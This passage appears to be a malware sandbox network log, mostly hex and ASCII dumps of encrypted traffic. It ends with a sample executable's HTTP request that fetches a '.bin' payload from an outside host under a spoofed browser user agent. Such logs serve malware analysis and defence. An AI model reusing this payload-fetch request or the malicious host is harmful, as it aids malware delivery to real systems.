                                                                                                                        Data Ascii: NH#qCfsIFb)M8[beyV2K]J==K9;Oy&Sg\D[bo^TZniwhGj2f'Gb="lYEOp81]j=,4|hP8)x[&_#?>!#[+71>49~?H+~SlgL5<
                                                                                                                        2021-11-25 12:01:12 UTC179INData Raw: 17 ca c7 b5 b0 fd 86 d4 50 e2 18 b0 be fc 2c 30 5c 16 11 88 54 5e c2 28 df 35 9a e5 69 10 10 31 89 2f e6 ff 54 6f a8 c6 95 52 74 48 c3 55 81 2d a3 39 d4 90 8c de 8f ac 70 eb d0 5c 9a b4 cb c6 df e5 6e 92 bb e0 07 43 df 69 24 b6 a3 ff 52 4d 29 ca 8f 99 4e 68 fd 8d 02 21 f9 01 4f d0 f8 f4 b2 d7 01 9e 4f 32 70 2f 03 53 61 cf 97 3d 62 d8 cb 03 51 97 a7 1f fa e3 e0 00 ae 92 0e 09 13 96 7e 52 65 3e 2c 36 85 a9 5f 75 e6 c6 6b 89 c3 66 55 25 98 6d c9 f0 bf 96 47 05 9a 61 2d 1b 23 3c d2 96 92 82 cd d6 ba 3e e6 4b 58 a5 48 1a 87 7a 4e a4 a1 b0 2f c4 55 d6 16 76 a6 7e 33 3e 12 d9 fe 29 5c 1b e6 13 d5 ac a1 ad c2 77 9a 02 73 8b ad 40 f6 2c 55 64 27 90 b5 a5 e4 a9 df 87 eb b3 1f 0e 25 a1 6a 1c 00 e9 16 a1 dc 22 2a cc fc 49 cb 9d 4b 61 fc 33 db 5f 43 37 03 c7 17 86 ac
                                                                                                                        Data Ascii: P,0\T^(5i1/ToRtHU-9p\nCi$RM)Nh!OO2p/Sa=bQ~Re>,6_ukfU%mGa-#<>KXHzN/Uv~3>)\ws@,Ud'%j"*IKa3_C7
                                                                                                                        2021-11-25 12:01:12 UTC187INData Raw: 5e 04 43 a7 80 c5 2e bc ac 30 1b fd 04 75 d2 7b c3 ff 8f b3 94 45 75 96 b0 c1 0e c5 b4 fe 2c b1 ea f1 19 bc 38 04 74 40 f6 58 cf 71 0f 1d 37 59 d4 56 20 d6 3b 0b 08 06 2b 25 af 1c e8 5d 25 2b a9 a9 84 c0 fc 5c 15 9e 07 91 73 db 7e b9 86 27 ec 6f ef 41 31 47 63 86 4f b4 d0 c0 7e 85 7f 34 15 92 9b a9 64 70 cc de 9f a5 6e db 3f e8 ec 35 9e a0 26 0f 59 b8 24 95 fd 58 9f 6f 6a e5 01 85 0a 0b 08 6a e0 61 43 7d 0a 70 5d d7 d5 19 95 5a d5 8c f0 37 72 50 a0 cc f8 47 f9 ef af e9 4c 94 65 65 81 fa 5c 37 a8 cb a6 7c dd a5 58 79 e1 91 0a 47 af 03 bc cf 03 e8 4d d6 93 39 65 e6 7b 6a fb 85 bc aa 46 76 d9 b3 d3 9e 04 54 9e 7f e3 4f 52 87 33 b9 08 2f a0 02 a8 b2 21 6e 07 d1 3a 84 8d 7a 08 c8 80 91 23 98 0b cb b7 03 07 3e 34 a9 c8 c4 db f6 7c 5d 81 f9 6a 58 32 78 f5 85 ae
                                                                                                                        Data Ascii: ^C.0u{Eu,8t@Xq7YV ;+%]%+\s~'oA1GcO~4dpn?5&Y$XojjaC}p]Z7rPGLee\7|XyGM9e{jFvTOR3/!n:z#>4|]jX2x
                                                                                                                        2021-11-25 12:01:12 UTC195INData Raw: 10 24 e9 36 49 4b 33 3f ba 8b 32 30 9e 48 46 3e 28 e7 ce c7 f9 03 d0 c0 2b f2 4b 41 2c 3a 96 8e 46 0d 63 2d d7 0b 4e d7 ba ef b6 ec 68 3b e0 4e de 91 bd dc 1b d2 04 7c c0 14 44 a9 bf 32 ea 46 fa 70 92 bb e4 c5 95 17 c9 a0 2b 0a 81 c4 0d 82 88 14 16 3b 92 db 30 c5 f8 f6 f5 b3 c6 8c ba b6 c4 91 6a 02 82 a5 9b 20 f9 72 f0 00 6f 46 3d 6c 9b f0 19 de 6a 19 23 92 bb 0b fb 12 49 d8 d1 4e 31 fa ca 64 ef 07 91 de 08 9e f0 1b c4 57 59 a7 89 e0 ea d6 40 3c d5 1e d7 ea 6e c0 f1 67 de c3 ef c4 80 61 ac 13 a5 fa 22 90 53 e0 43 11 ec c3 e9 c4 f0 78 10 cd eb 15 6c 89 de e4 fe da 0c 85 a1 7c e1 ec 18 42 b4 26 ea ea 93 ec 02 99 62 cb 42 0d b1 ce c6 06 10 35 4b 6b dc 91 88 92 c5 92 42 60 e4 07 80 b6 f6 b7 dc 88 2f 35 f3 c9 a7 ca 6e 25 6b 6f 92 8c 5a ac 9d 81 6f 70 42 41 83
                                                                                                                        Data Ascii: $6IK3?20HF>(+KA,:Fc-Nh;N|D2Fp+;0j roF=lj#IN1dWY@<nga"SCxl|B&bB5KkB`/5n%koZopBA
                                                                                                                        2021-11-25 12:01:12 UTC203INData Raw: 8c e2 92 21 9f f8 12 80 71 84 bb 0d 80 91 03 cc 26 88 73 33 ec 1a dd b9 91 14 4c 37 25 ba 25 7e ef 29 a1 28 6c c5 3d bb 07 44 cd e3 18 34 78 b9 e8 f0 f3 88 4f d4 cb 68 a4 fc 81 7b 7d 01 17 38 a3 f9 03 2f 47 85 af 26 e8 15 78 e9 d3 8a 28 94 95 0c e9 77 8b c1 d0 0f 3b 94 07 9b 6d 7a 2e ca fa ce 04 90 40 1e 60 b7 42 32 d7 88 60 d7 01 4c a0 5e cd 95 16 83 c1 e5 19 71 d4 ff ef b3 dc a3 40 aa 69 a1 87 79 10 75 a2 d9 c6 08 60 bc 69 b4 13 01 ef 9c b6 75 ea 17 ed 29 9a 03 a0 d6 eb b7 a5 0c 5a 64 5c a2 2b d3 cf 9f 5c 5e ac 0a d6 34 49 a4 4a a2 c7 83 ee 75 86 ae c1 67 cf 6f ca 3f 0e 9e b0 f9 e3 f9 e7 7f b7 97 3e 5b 8a a2 bb 41 14 53 f6 90 07 8e 60 df 0a f8 18 77 4c 6a 8f 8b 69 1f c7 08 6d cc 53 12 bf 2b b1 e2 4a c4 a6 d7 50 59 f2 5d 9c 2a 68 71 21 fd da 71 20 5c 63
                                                                                                                        Data Ascii: !q&s3L7%%~)(l=D4xOh{}8/G&x(w;mz.@`B2`L^q@iyu`iu)Zd\+\^4IJugo?>[AS`wLjimS+JPY]*hq!q \c
                                                                                                                        2021-11-25 12:01:12 UTC211INData Raw: 77 74 a8 2a 4b e2 06 58 96 8d ca 8d 97 65 ff 91 4b 09 4b d8 7f 8a 8e 9a b1 7a 27 ad e7 be 0a c7 2a 84 66 f3 ed 22 14 a0 8a ab 86 86 a0 57 c7 6f 49 8f 15 82 df 06 4e ee 1b 5c 2f df ae ed cb 0c b3 38 49 dc d3 b9 ea 5e c8 37 11 ee 80 f9 3c 02 88 cf ac d7 f7 ec fc a8 71 ea 2c b6 70 94 26 40 07 5d ce 15 cb fa 24 65 43 be 34 b0 53 91 40 fd 60 7e 3a 3b 2a 60 f3 8c 2f 3f bd d9 42 87 58 a9 8f 58 3c c4 93 32 74 55 f4 6e a1 4c b1 6e 83 75 68 2a 4a 63 ea cb 02 48 d2 d8 d5 9a a0 b7 fc 06 03 1a 56 ba 3f 46 4b 5c dd a9 e8 2a 7d df fb 81 e2 7b b7 60 72 c7 5b 59 a1 35 ca e0 7f 37 65 86 21 06 3e e0 0d 95 41 ac 28 fe 43 2b 31 3d d3 fc 21 7d 45 2e f3 d0 cb b9 1f 31 33 22 df 1d 92 a1 fe 51 3d dd d7 2a 99 ee d0 7d 36 26 61 80 a9 c0 f3 18 39 8e 12 f9 c0 d1 a8 15 3d 5f 2f c9 82
                                                                                                                        Data Ascii: wt*KXeKKz'*f"WoIN\/8I^7<q,p&@]$eC4S@`~:;*`/?BXX<2tUnLnuh*JcHV?FK\*}{`r[Y57e!>A(C+1=!}E.13"Q=*}6&a9=_/
                                                                                                                        2021-11-25 12:01:12 UTC218INData Raw: 93 f7 95 01 1c e9 c9 90 db 44 18 c7 57 d0 65 23 22 c6 e3 c8 e8 80 e5 ee 48 59 19 f8 44 3f 5a 75 8b ab f1 fd 5b 06 57 6a 17 2d b3 e0 72 42 bc f5 13 a7 75 1a 9a c1 ad fe 4f cd 14 9e 03 2b 88 7c 5c 2d de ce 87 bc 11 6a 59 ba 4d fb c2 82 cd 64 f5 a3 d0 35 13 1f 03 48 7d 4f 0b ae 21 9c 2e 3f af ea b2 ed b3 c9 a7 85 bf 28 3a d8 92 a5 97 f7 58 6e 54 5d 55 59 b9 c8 70 61 b3 c5 12 1d 94 99 4b 0e 46 70 95 fa 71 be 7a 19 bc 37 de 26 a5 ab 9b 17 51 14 dd 66 56 fe 0b e3 d4 a9 5b fb d2 71 2a 86 9d 04 9d 71 a0 dc f7 dd 00 fe b7 47 c8 ef 63 22 56 3c c7 bd c8 38 c9 13 86 fc 3d f0 20 87 af 9f 46 1e bd bf 5e a8 85 3e 73 78 06 b5 45 c5 62 eb 73 8f eb ec e4 1d 01 2e 4d 1c 89 c4 3d 54 c8 fe f1 95 7c 0b c4 4a 71 37 e0 19 d0 dd ba 8d e7 1d bd fb 49 18 0f 47 81 bc 97 af b3 93 75
                                                                                                                        Data Ascii: DWe#"HYD?Zu[Wj-rBuO+|\-jYMd5H}O!.?(:XnT]UYpaKFpqz7&QfV[q*qGc"V<8= F^>sxEbs.M=T|Jq7IGu
                                                                                                                        2021-11-25 12:01:12 UTC226INData Raw: c0 96 49 cd 9d e3 59 af 89 f3 bf ba ca 96 50 ca eb d6 6b 0f df e2 39 a1 bb e1 71 2e dc 70 7c b3 fe b1 3d 5a dc 17 19 2b c5 8d eb ec 96 69 78 a3 1f 61 30 c4 3d f9 58 2a 3d 95 1a 3b 1d 02 8e c8 9c 35 3b 7e 33 01 91 2c 2a 2a e7 1e 0f cd 58 3e c2 7d c3 1e be 57 d0 1f 43 a8 e9 b1 e1 65 65 8f aa 09 4a 95 40 0a 95 59 2c 47 21 76 34 1d 92 67 77 b4 2e 95 22 53 5b 16 a9 33 38 85 97 9e ad c7 bd cf 33 ae fe 8a e3 4d 65 3b a0 e3 f1 b3 28 45 95 ae 00 8d 57 13 4d a2 aa e7 81 51 61 d0 3a 4f 10 b9 23 68 07 29 52 ac 1b 34 1a 61 05 ca c5 07 d4 3b 5c 3e 99 97 0f cd 2b b8 2b 47 dc 01 59 73 a3 f9 e5 7c 3f 1b 4f 39 e3 d8 ea e1 2b 3d 52 83 f5 59 f7 1d 9b 93 18 ea 77 43 8c 82 0e dd 90 bb 77 55 02 41 de 8a 0f f8 0c 72 5a 48 d7 a8 76 d4 12 f4 7a 30 0e 5a 2a c4 bb ed d6 7e f9 92 16
                                                                                                                        Data Ascii: IYPk9q.p|=Z+ixa0=X*=;5;~3,**X>}WCeeJ@Y,G!v4gw."S[383Me;(EWMQa:O#h)R4a;\>++GYs|?O9+=RYwCwUArZHvz0Z*~
                                                                                                                        2021-11-25 12:01:12 UTC234INData Raw: d9 61 6f 9a c0 da 28 6c 0e 3e cf 1c 0f cd c0 4e 75 e2 54 1f 7d 92 f6 a6 e5 a7 f5 96 5f 8a 39 27 ba 8a b0 99 c5 e0 6f f7 4e fa 16 01 e5 46 de 9b 99 66 19 1e 4a 44 f4 f9 58 fd a9 f2 38 3b 90 ca df 9e bb d7 ce 69 bc 3d fb dc 3c 66 a3 83 fc 36 c4 d7 df 90 46 f9 ed 98 c1 19 e5 92 ef 07 e3 d5 a0 c6 9e 0c 9f a1 f3 01 b6 26 8a dc 6e 40 af d8 f1 6a f2 6f 49 47 4d 9a 61 a8 50 68 a6 5e 83 b1 ea 10 ba 8f 83 79 f0 48 37 81 5d 3a 2c d7 d3 4f 62 6f 86 cc 10 4b 6b e4 46 6a 3c 85 6d 30 1a 8a fd 2e c0 e1 22 97 b9 91 35 f3 67 4f ee e9 a3 6b ec db 09 97 c6 d6 80 fa 8d 42 c3 7f 55 eb 49 b2 62 a0 8f 86 06 be 98 42 d4 c3 6b 57 f3 bf 35 86 89 96 57 6c 93 e6 c5 a6 da 7e 9a b0 78 d2 8b 73 11 59 e1 4d 0a 08 6f 0b ad 00 15 c0 e5 05 92 b6 f2 45 9f 32 67 c6 e4 ff 73 cb 17 f0 19 02 7d
                                                                                                                        Data Ascii: ao(l>NuT}_9'oNFfJDX8;i=<f6F&n@joIGMaPh^yH7]:,OboKkFj<m0."5gOkBUIbBkW5Wl~xsYMoE2gs}
                                                                                                                        2021-11-25 12:01:12 UTC242INData Raw: 9f 4f 06 44 ed 3a 67 59 cc 84 6b 7b 2d c1 d9 f8 20 b1 c6 eb c2 28 b5 b6 fb a1 11 3e 80 aa 47 c1 50 98 fd bc ce de 3a 95 60 64 17 67 4e eb 32 49 be b4 0c d6 ba f8 9e 04 71 98 1b 82 3e 4a 26 25 b9 37 fd 1b 7c cf 67 ba 33 36 67 d4 00 9a 55 17 45 a0 fa bd 7e 1f f2 d7 03 23 43 a8 de 65 00 d3 08 03 ac 26 b0 2c 8c 9f 1e c0 da e5 37 2a 35 8f e7 cb 8b 47 8d 80 aa 84 3c 1a d1 1c 19 3b 59 32 00 ee a6 ee 0b 4e c7 d6 f8 60 ad b4 4e 79 42 75 54 88 f2 ab de 03 1b 96 83 4b 6a df 54 a9 aa 6e b0 e1 59 b2 15 34 66 e8 e4 10 64 a7 08 47 f3 f3 61 15 2e 78 ed a5 b0 da 42 62 c8 f5 ec fc 71 c6 15 d3 b6 70 90 fc de b0 d8 4c 15 cb a1 22 0d 1e 81 48 b6 16 0c 62 9e ee 76 33 fb 7a 62 30 2c a9 7a 45 06 87 0c 22 52 7a 0a 6c 7d d4 5c 7b 06 25 f8 e3 42 5f 87 a5 38 68 74 4a 91 e5 5e e3 9d
                                                                                                                        Data Ascii: OD:gYk{- (>GP:`dgN2Iq>J&%7|g36gUE~#Ce&,7*5G<;Y2N`NyBuTKjTnY4fdGa.xBbqpL"Hbv3zb0,zE"Rzl}\{%B_8htJ^
                                                                                                                        2021-11-25 12:01:12 UTC250INData Raw: bf 18 09 42 e2 32 a7 0c 30 08 90 55 a3 2b b9 b8 84 1b 45 41 c0 82 0d f4 a3 b8 a8 a1 ae bf 2b 47 44 a8 2c 5b 84 87 82 7f c9 9b 6b 1f 6d 0d b8 2e 97 55 5e a3 b2 0e 82 ab fc 9e 64 d2 e3 db 86 9e 55 b0 a9 d1 f2 bb 97 b6 96 fa 25 c7 54 b7 c9 14 13 bd 1a af 9d 05 6a aa a7 80 ec cb a8 16 a0 38 10 e8 a8 69 ce d4 d1 a9 3f 51 0b 5a 61 f5 31 26 f6 f7 f7 5b 80 8e be bc fb 2f 27 9a 5b da 49 41 39 43 cd ac 92 7a 02 0f 2b d8 c9 56 b9 b8 cf 20 50 fb 06 c6 18 70 c4 62 b4 de 90 85 2b 5f e3 7d e5 8a 74 3e 54 ff 48 54 54 be b8 3b 55 e8 b3 16 07 4a 4b ff 86 83 6a 3d 2b c7 d1 3a ff 68 e3 f2 7c ee 76 ae 25 a6 a4 93 50 16 ff 63 44 28 38 44 cb 23 44 7e be 0e 8c a1 9e 33 02 54 7b ba 5d 74 3d 0e c7 eb 9c 51 cc db 9e 55 ea f2 fa 73 c5 2e 92 50 b4 6c 89 16 c5 98 1b 85 5a 11 b1 98 fc
                                                                                                                        Data Ascii: B20U+EA+GD,[km.U^dU%Tj8i?QZa1&[/'[IA9Cz+V Ppb+_}t>THTT;UJKj=+:h|v%PcD(8D#D~3T{]t=QUs.PlZ
                                                                                                                        2021-11-25 12:01:12 UTC258INData Raw: 5d 34 b0 7b e5 91 6f 0b 13 20 17 da 67 57 a0 87 bf 95 4b 66 08 4b b8 f4 c4 76 99 4f 85 62 02 7e 7d c1 73 21 d0 bf 49 0d d8 7a 64 07 5f 4f ce 97 0a dc 94 26 24 cc a7 4c 6b 2f f2 7e d5 0d 1a 2d 1f 6b 5e d1 6c 73 4e 35 71 98 45 e0 30 a7 b3 8d e3 5d 52 d7 4c df 66 ca 50 e6 9e f9 db cb 67 4b 61 1b 57 48 5b 67 11 3f fc 47 11 41 a9 1b 47 a7 b8 c5 bd 5d 66 f8 13 45 90 28 7e 19 90 4b 33 56 49 07 39 04 76 b3 75 01 cd 93 5b ed 1d e3 5a db 2b d2 ec 35 77 76 79 03 df f5 d3 92 6d 4f 01 fe 86 4d 0b 07 3e 66 8d d9 0e c0 9b 7e cd be c2 80 5c 5e d5 b2 e2 15 84 2d 45 89 c4 ba e9 61 08 90 3f fe fe 22 7e ec 44 62 1b 5a 49 79 0a e9 f7 34 42 40 f0 a0 0a 7b 2a fd 43 2e b3 1f cf 90 f7 b9 c5 01 85 38 a2 62 bc 74 89 5f c5 3a 50 99 72 7b 4a 7a e7 4f 3e 3f 4f 01 07 17 8f 87 bb 3b 67
                                                                                                                        Data Ascii: ]4{o gWKfKvOb~}s!Izd_O&$Lk/~-k^lsN5qE0]RLfPgKaWH[g?GAG]fE(~K3VI9vu[Z+5wvymOM>f~\^-Ea?"~DbZIy4B@{*C.8bt_:Pr{JzO>?O;g
                                                                                                                        2021-11-25 12:01:12 UTC265INData Raw: 18 ba d6 5f 31 8a 16 79 cd 91 4e f2 19 c0 f5 c6 18 df fe 49 41 a4 f9 01 01 c3 25 55 8b 7b b0 39 2d 43 7e f3 c0 eb 7a 5c d6 bc fe 7c 4e d0 ba 11 1e a4 17 b2 32 49 ce c7 7a 4e 8d b9 60 b8 33 b8 6d 1a 1d 83 d0 d2 a9 67 fc d6 70 ec 9d f4 a6 bd 6e 42 bd d6 80 76 ef df da 0d c8 05 47 ad b3 dd 5f 07 09 ba 73 79 96 b3 61 05 11 76 d1 62 e7 5f 5d 42 68 6b 6c b0 7c 3b c2 95 30 81 73 b3 09 38 ae 72 9e b7 c4 97 c2 e7 ca 91 83 30 b2 cf da aa 1b fa 3a 81 b4 90 12 de 6a 7a 66 5f cd b1 6d 9d 5a a9 e4 12 33 71 2f d1 0b 58 c2 41 59 a7 9f ae 57 ba da c6 cc be ec e5 b7 ad 90 16 3f 23 18 f1 78 a1 e6 64 42 92 13 28 a0 11 10 8f b0 25 fd b6 ab df 1c b7 53 bf bf 30 99 84 a1 6d 4f f4 d6 6f 06 a3 69 83 2a ac 32 1f 4d b2 91 8a a4 51 6c 98 d7 6d 3d 14 3f df 56 31 39 ed d0 3c ce ab fb
                                                                                                                        Data Ascii: _1yNIA%U{9-C~z\|N2IzN`3mgpnBvG_syavb_]Bhkl|;0s8r0:jzf_mZ3q/XAYW?#xdB(%S0mOoi*2MQlm=?V19<
                                                                                                                        2021-11-25 12:01:12 UTC273INData Raw: 6f 5d 45 95 9d 3b a9 46 1e a9 07 f0 80 ff 1a c7 4e 4d 60 f6 d3 24 ac 27 97 eb 78 e5 e4 a6 88 9b a3 fe 0a 74 0e 32 12 df 1c 3c 25 9c 0d 2f 91 02 62 3f c4 89 de 67 b4 4f 61 d8 7a 83 b1 61 55 39 e2 4b e9 6d 26 98 ce 55 e1 11 d3 32 0a 3d 68 6d c2 66 1b 83 d9 97 18 4e 47 56 c3 60 20 88 38 c2 f3 2e dc 30 4a 41 70 12 57 8b 03 ae 63 67 16 90 d4 ff a2 0a 98 d8 40 7d 17 e4 00 b6 c0 64 24 7c a8 16 dd 07 f1 21 cb 98 d6 27 39 3d a7 ec d0 07 2c eb ec 90 aa 8a 15 2e 68 5a 7f f1 9d 84 a6 31 df ee 0b 8b 7e be e3 e4 18 74 97 3f a2 a3 1d c8 16 63 da a7 49 8b 0a 4a 33 fa ff eb 53 3a 00 88 5f 82 e3 3f 29 fa c7 ef 47 6c 78 5b e4 49 ea 16 1c 84 e2 89 05 a2 3e 18 1a ef 81 a1 0f 5d 66 05 cd 9e e9 a7 39 c4 3a 1c be 6a b9 84 90 82 b3 2e 12 4f 3a 26 41 41 75 54 5d 38 69 c3 3e 92 18
                                                                                                                        Data Ascii: o]E;FNM`$'xt2<%/b?gOazaU9Km&U2=hmfNGV` 8.0JApWcg@}d$|!'9=,.hZ1~t?cIJ3S:_?)Glx[I>]f9:j.O:&AAuT]8i>
                                                                                                                        2021-11-25 12:01:12 UTC281INData Raw: d7 10 b6 98 45 cc 3c 2d e9 70 9f 88 67 fe 72 93 45 00 1d c6 9b 03 23 12 a3 77 0d e2 5b ea 8b 15 f5 ba d5 3d 5c f6 4b d5 b4 61 9a 8b a9 6f 43 88 8a 8c 8b 8c 4b 9c 87 62 97 fc 66 9a e9 3a 8b 21 e2 b2 c7 2e 5d 99 66 5c 78 22 51 43 75 54 53 c8 c8 23 b0 18 90 8e c2 88 20 f9 e7 07 96 e0 6a df 0a d1 5c ee 31 e7 97 dd 65 b8 ea 5e 61 df 9c 7b 80 05 9b 3e b2 ca 61 57 2f 53 80 be 77 ea 10 dd b4 a0 a3 80 50 1a 24 9d 43 72 21 01 d4 a0 34 b0 c1 91 5d 15 60 7e 61 38 93 3d 97 2b db fc 55 54 d7 87 a4 0e b3 e3 73 cf 7b 28 b7 bd 77 aa b1 13 51 ac eb fd e0 fc 49 6f 15 ea 97 ba 9c b5 d5 66 5f 48 f4 93 02 76 00 bb 3f 08 2e 5c 21 56 17 23 56 e8 85 35 1c 3e 28 88 72 c7 3d d0 6d b3 23 00 73 36 17 c0 c9 fa c1 1f 5d 25 47 a2 a7 7e 30 58 b7 d5 2f 03 de 2c 4b 05 5d 85 a9 b9 63 36 fb
                                                                                                                        Data Ascii: E<-pgrE#w[=\KaoCKbf:!.]f\x"QCuTS# j\1e^a{>aW/SwP$Cr!4]`~a8=+UTs{(wQIof_Hv?.\!V#V5>(r=m#s6]%G~0X/,K]c6
                                                                                                                        2021-11-25 12:01:12 UTC289INData Raw: 77 d8 7b 6b 2a 25 48 05 38 5e 9d dc f4 d5 3c 5d e0 6e e4 c8 68 e7 36 a5 16 5a 57 9b 93 9c 0c 60 78 8c 64 f7 4c 19 9e c8 33 5e 88 6e cf 74 36 3e 04 4f 09 ea ed c5 a0 59 b6 9e df dd 6e 38 70 0d 5c e9 b5 4b 39 d8 0d a4 54 49 21 d1 5c 77 d0 6c a6 50 75 c9 e3 e0 58 c7 6a 53 79 02 74 05 5a ae 8a d6 83 0c 58 7a 6f c3 4a 54 b1 aa 7c 6a 0f 22 66 7e da 93 a1 94 3f 56 58 62 52 0b 69 bb 7a 3d fe bf a3 32 07 83 f0 9d b1 c9 a2 64 07 f7 ea 9b 79 6d d3 30 72 a2 49 17 2d e3 35 af 55 f3 b4 aa e4 70 ed 05 8c f2 a5 de b7 08 77 56 fa 52 c8 9d d8 10 54 46 9e ec 20 66 3a a1 4b 55 3f 11 a6 fd ca f1 2c cc a6 18 1b b6 02 21 ec f3 55 2b 67 16 d5 86 01 3b 2b 8a 92 86 c5 87 df 33 ce 8f 80 ef cf dd 67 9a 1c b9 12 3e cb a2 d2 53 e6 59 a9 4a 31 bf 19 18 a0 d3 d9 df 5e d1 42 b2 1e f3 e0
                                                                                                                        Data Ascii: w{k*%H8^<]nh6ZW`xdL3^nt6>OYn8p\K9TI!\wlPuXjSytZXzoJT|j"f~?VXbRiz=2dym0rI-5UpwVRTF f:KU?,!U+g;+3g>SYJ1^B
                                                                                                                        2021-11-25 12:01:12 UTC297INData Raw: cb 25 e9 09 0a 08 6c 8d 8b 5b 75 bd f1 b1 f1 0d 75 87 30 c0 6a 79 ca 9a 11 96 39 85 12 83 5b ec cb c2 11 25 bf 7d 84 49 61 87 75 48 20 d3 77 54 80 6d 37 d6 21 5f f7 3a 47 51 af d0 51 81 fa 8a 4c 26 63 57 94 fd 3d f7 d7 e7 68 b1 73 f4 97 f4 f0 c4 79 dc 51 18 5c 96 56 23 ea 00 35 e3 40 c1 24 d2 f5 1f 01 93 c3 f7 73 79 10 02 14 f7 8c dc 89 2c 3a a8 84 ad 05 81 69 03 54 95 e9 ca 86 f7 b0 f1 15 f7 7d 81 31 5b 95 bd 4d a1 3e ad a4 0a e6 54 40 fb f9 20 09 aa a8 80 88 2a fa e5 0f 89 3a 3b 4a b9 ec cd bc e4 2e 6f 43 f4 1e ae 6d 18 75 46 3c a5 4f db 34 9c 46 8e ce 9b b1 93 43 fc eb f1 43 76 76 eb 4c a0 b4 c5 7d 49 44 3b f3 22 61 46 c5 ac ed ca af ad b4 eb d0 ab 13 80 af 21 78 a0 df c5 1c 87 fc 15 80 eb 65 84 73 26 72 96 b3 fe 20 21 79 fd 60 2f 60 a9 6c ec f9 cf 4a
                                                                                                                        Data Ascii: %l[uu0jy9[%}IauH wTm7!_:GQQL&cW=hsyQ\V#5@$sy,:iT}1[M>T@ *:;J.oCmuF<O4FCCvvL}ID;"aF!xes&r !y`/`lJ
                                                                                                                        2021-11-25 12:01:12 UTC304INData Raw: 14 27 0b 9e 3f 22 e9 e1 4b d7 fd cc 2a a7 20 d8 27 4a 9c 34 f2 fa 06 6b 51 fe e8 1e ef d9 65 5a 30 88 ae 98 ec 32 c0 2b 3b f3 6b 7d 5e 83 15 29 c8 e7 62 72 4f 8c 26 85 aa fa cf 66 09 05 02 d1 12 ae 29 d8 86 31 29 1e 97 c9 89 c3 d7 06 9f 65 8f 3e c1 85 6c 36 fd 3c 3a 7e 39 a8 d8 ce 56 6a 11 ec 96 bb 06 9e 1f bc d1 08 55 d1 21 b0 f2 d2 e2 af 1c ad d9 fa 80 cc be 13 3c 63 f4 d9 29 6d 36 61 01 2a 29 84 0d 19 8f 4a 65 9a 08 8d 93 60 57 20 9a 19 ec 50 27 97 5c da 73 d2 4a 49 73 64 fa ee 91 c5 c2 e5 69 16 f4 3e 59 92 80 2c 94 20 8f 45 08 cb 2d 15 35 8f f3 4b 37 e6 65 cb bc 8e 2c d3 63 82 f4 81 74 54 03 3b 09 9d 85 4e da 1e a3 23 5a 54 72 7d 03 30 a8 bb 60 2e 83 4e dc 16 7d ef fe 6e 6d 33 b1 f0 a1 64 a6 48 3b 4f 21 2b 9e 7f 39 4d c1 5a 3e 27 bd eb e3 29 c9 27 eb
                                                                                                                        Data Ascii: '?"K* 'J4kQeZ02+;k}^)brO&f)1)e>l6<:~9VjU!<c)m6a*)Je`W P'\sJIsdi>Y, E-5K7e,ctT;N#ZTr}0`.N}nm3dH;O!+9MZ>')'
                                                                                                                        2021-11-25 12:01:12 UTC312INData Raw: 7d ee 93 7c c8 a7 54 e9 e1 5f 44 d4 7b 12 05 02 53 9a 24 be 8f ee 28 6e 94 04 0b e3 80 fc 64 b6 94 90 4d c1 cb 50 70 5b 0c e3 da 4d 13 12 79 c9 d5 39 2c ba 06 19 fa 4f 70 ca 7f cc dd 3d 43 10 1c 4a 6b 80 dd b6 b9 3c e5 4f 38 8b 8b af 80 fd 32 8e 5c 66 e9 be 8e 5c da 58 ce 0c e9 a1 5d fe de 19 6d 15 ec 43 35 f6 8f b6 5d 29 e9 ab ed 8e 13 13 01 6c c1 b6 66 7e 9e d8 ea 93 9e 56 cb 42 90 99 98 79 ca cb d1 d6 aa 89 d0 d6 81 1c 74 cd 82 e0 6b 93 48 f2 0f 9c c2 fb ee f8 ca 1b 76 60 c2 ae ab 9b 5d 07 1d cd 6d 03 39 4b 02 c2 06 5e fa e6 d2 57 5d 95 38 2c aa 8d 0f 9b a8 dd 19 c5 52 b3 1f ad b5 02 25 ab 37 36 60 25 b8 cc cd 2c 39 71 e8 86 57 cc 8d 44 ea 3e 87 9f 5b 0a 60 8b 99 66 aa b4 52 b4 91 ca 69 c7 29 63 93 e4 9e 0c c0 ee 48 c3 41 2a 4b d5 ff 09 33 8b 8f 7e 30
                                                                                                                        Data Ascii: }|T_D{S$(ndMPp[My9,Op=CJk<O82\f\X]mC5])lf~VBytkHv`]m9K^W]8,R%76`%,9qWD>[`fRi)cHA*K3~0
                                                                                                                        2021-11-25 12:01:12 UTC320INData Raw: 07 13 23 bb 38 c9 12 7e 8f ba c8 7b 28 f2 25 a6 e8 69 ac ac 9a dd 8f 1d a9 13 57 58 58 e8 63 34 d0 83 66 01 0d 00 6c 4b 59 dd 90 91 dd 19 42 76 7f e8 78 a2 04 fb 83 63 bd 05 c7 d2 0e e1 d9 00 60 8a 34 73 c8 78 3e 5b e7 3e a3 9d ed 5b 1a 06 f0 9f 51 fa 44 a4 95 ae 99 79 f2 2b 5c 9f c0 c4 5b 64 a1 76 e2 26 98 54 b0 67 60 f8 9b a2 b3 6a 1d d4 ac 87 32 f3 54 da 1b 70 52 c3 09 51 1c 05 4a 39 37 8c 1e d5 98 4a dd 10 04 06 0e ab c0 ec de 54 c1 e5 4b e3 9f a9 b5 33 0b 6d 03 3b ea 64 49 a1 8a c4 0d 1b d3 59 41 4a 0d 86 49 38 72 c8 ca cd 5f cf 0c 86 70 a9 fc f7 09 35 b1 a9 71 42 c4 37 f4 b8 4f 18 f7 22 b0 e9 62 6e b5 c8 df 7e 73 f2 93 ab 94 f2 9e 37 6b 95 f3 05 3d 96 36 a0 97 a6 db a5 95 e4 a7 7e 3a e0 e6 ed 80 3b 17 16 ed fc ab d1 bc 64 ff 41 fb eb 91 c1 8e 6f f4
                                                                                                                        Data Ascii: #8~{(%iWXXc4flKYBvxc`4sx>[>[QDy+\[dv&Tg`j2TpRQJ97JTK3m;dIYAJI8r_p5qB7O"bn~s7k=6~:;dAo


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                        2192.168.11.2049840107.6.148.162443C:\Users\user\Desktop\Zr26f1rL6r.exe
                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                        2021-11-25 12:01:25 UTC327OUTGET /GHrtt/bin_kbJoepxz175.bin HTTP/1.1
                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                        Host: atseasonals.com
                                                                                                                        Cache-Control: no-cache
                                                                                                                        2021-11-25 12:01:25 UTC328INHTTP/1.1 200 OK
                                                                                                                        Date: Thu, 25 Nov 2021 12:01:25 GMT
